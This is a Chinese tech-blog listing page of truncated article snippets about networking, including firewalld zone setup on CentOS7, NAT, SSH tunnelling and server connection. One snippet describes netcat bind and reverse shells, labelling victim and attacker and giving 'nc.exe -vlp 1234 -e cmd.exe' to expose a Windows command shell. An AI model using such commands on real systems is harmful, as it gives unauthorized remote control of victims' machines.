网关服务器和网站服务器都采用centos7操作系统;网关服务器安装3块千兆网卡,分别连接在Internet、企业内网、网站服务器。要求如下:网关服务器连接互联网卡ens33配置为公网IP地址,分配到firewall的external区域;连接内网网卡ens37地址为192.168.1.1,分配到firewall的trusted区域;连接服务器网卡ens38地址为192.168.2.1,分配到fir
分类:
其他好文 时间:
2019-09-01 20:20:03
阅读次数:
138
案例环境:需求描述:连接内网网卡ens33地址为192.168.1.1,分配到firewall的trusted区域;连接服务器网卡ens37地址为192.168.2.1,分配到firewall的dmz区域;网关服务器连接互联网网卡ens38地址为192.168.3.1,为公网IP地址,分配到firewall的external区域;网站服务器和网关服务器均通过SSH来远程管理,为了安全,将SSH默认
分类:
系统相关 时间:
2019-08-30 19:06:20
阅读次数:
119
前言 我们上网用的IP并不一定是本机网卡的IP地址,由于公网IP地址稀少,国内绝大多数电脑上网,一般都是通过拨号或者端口映射。多个内网地址映射到一个公网地址来实现上网的。 目录 1.查看本机网卡ip 2.查看本机外网ip上网ip 3.路由跟踪查询上网-网关ip 查看本机网卡IP Windows 查看 ...
NAT分为静态NAT和动态NAT,静态NAT转换时,一个私网地址对应一个公网地址,并不能节省地址数量
分类:
其他好文 时间:
2019-08-26 21:26:02
阅读次数:
102
近期家里更换了移动的宽带,拨号后拿到的是10开头的内网IP,就不能像之前一样通过路由器的端口映射实现从外网访问主机的远程桌面。这种情况下可以利用一台具有公网IP的服务器充当中转,利用SSH的隧道转发功能将远程桌面请求转发至内网主机。 SSH隧道 SSH 会自动加密和解密所有SSH 客户端与服务端之间 ...
分类:
其他好文 时间:
2019-08-25 19:57:20
阅读次数:
128
比较难的一点是:部署到云服务器上之后,通过公网没法访问。 这就要说回道 本地开发时的一个小细节:通过http://127.0.0.1:5000是可以访问的,但通过http://[本地ip]:5000是没法访问的,当时没注意这点,因此部署到ECS时产生了一个难点。 解决方法是在server.py改一条 ...
分类:
其他好文 时间:
2019-08-23 23:57:32
阅读次数:
219
一、使用远程连接软件 (如 Putty、XShell) 连接你的Linux服务器,本教程以 Putty 为例。 1 启动 Putty.exe 程序,进入 Putty 主界面。 2 在 Host Name 中输入Linux的公网 IP 地址。 使用默认端口 22。 在 Connection Type ...
分类:
系统相关 时间:
2019-08-22 19:09:02
阅读次数:
184
网络编程:跟服务器底层源码有关B/S在公网上(浏览器访问)服务器端和客户端只写一端,c/s在局域网上(网吧)服务器端和客户端都要写,B/S是大大的C/S协议:端口之间的交流更畅通,不同软件有各自的端口tcp/udp/httpip:定位一个节点使用静态方法getLocalHost方法创建InetAddress对象,InetAddress没有构造器InetAddressaddr=InetAddress
分类:
编程语言 时间:
2019-08-20 12:53:28
阅读次数:
90
正向连接 受害者 IP 是直接暴漏在公网的 或者你们同属于一个内网 受害者:nc.exe -vlp 1234 -e cmd.exe 攻击者 nc 192.168.1.1 1234 nc -lvvp 80 直接监听内网所有主机80端口 反向连接 受害者 A 出于内网状态 192.168.1.25 攻击 ...
分类:
其他好文 时间:
2019-08-17 14:34:19
阅读次数:
108
基本环境 (一)安装服务器硬件要求 交换空间要求如下:--内存在1~2GB之间,sawp空间是内存的1.5倍--内存在2~16GB之间,sawp空间与内存大小相等--内存在大于16GB,sawp空间等于16GB (二)服务器IP地址规划 注意: 1.一共包含2个IP网段,公网、虚拟、SCAN必须在同 ...
分类:
数据库 时间:
2019-08-14 23:26:32
阅读次数:
155
